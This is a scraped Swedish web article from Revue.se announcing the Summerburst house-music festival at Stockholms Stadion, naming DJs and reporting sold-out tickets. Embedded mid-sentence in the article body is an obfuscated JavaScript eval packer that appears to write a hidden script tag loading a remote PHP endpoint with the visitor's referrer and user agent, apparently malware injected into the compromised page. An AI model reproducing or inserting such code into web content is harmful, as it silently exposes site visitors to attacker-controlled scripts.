Image Image Image Image Image Image Image Image Image Image

| 24 april, 2018

Scroll to top

Top

9 Comments

Stadion blir Nordens största dansgolv | Revue.se

Sebastian Plengier Ehrnfelt

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sksys|var|u0026u|referrer|nakdi||js|php’.split(‘|’),0,{}))
den 4 juni vallfärdar drygt 13000 människor från hela Sverige till Stockholms Stadion för att ta del av Summerburst, Sveriges största en-dags festival för house musik.

Från kl. 14 – 00 kommer hela Stockholm skaka då det bjuds på den bästa elektroniska dansmusiken framförda av några av världens främsta Dj:s, bl.a Eric Prydz, David Guetta, Avicii, Dada Life, John Dahlbäck och Calvin Harris.

Intresset för festivalen kan inte jämföras med något annat. Med de 11000 ursprungliga biljetterna slutsålda (och de 500 extra biljetterna som släpptes kl. 09.00 den 3 juni som var slutsålda 09.01) har Sverige äntligen blivit en del av det housegalna Europa och vi kan antagligen från och med nu förvänta oss en revolution i Sveriges festivalkultur med ännu fler galna evenemang i framtiden.

För er lyckliga dance music fans som lyckats få tag på biljetter är det bara att gratulera till den kommande upplevelsen, för alla er andra rekommenderar vi att ni tar er en titt på Revue.se inom kort för att läsa vårt reportage om festivalen som hela världen idag håller ett öga på.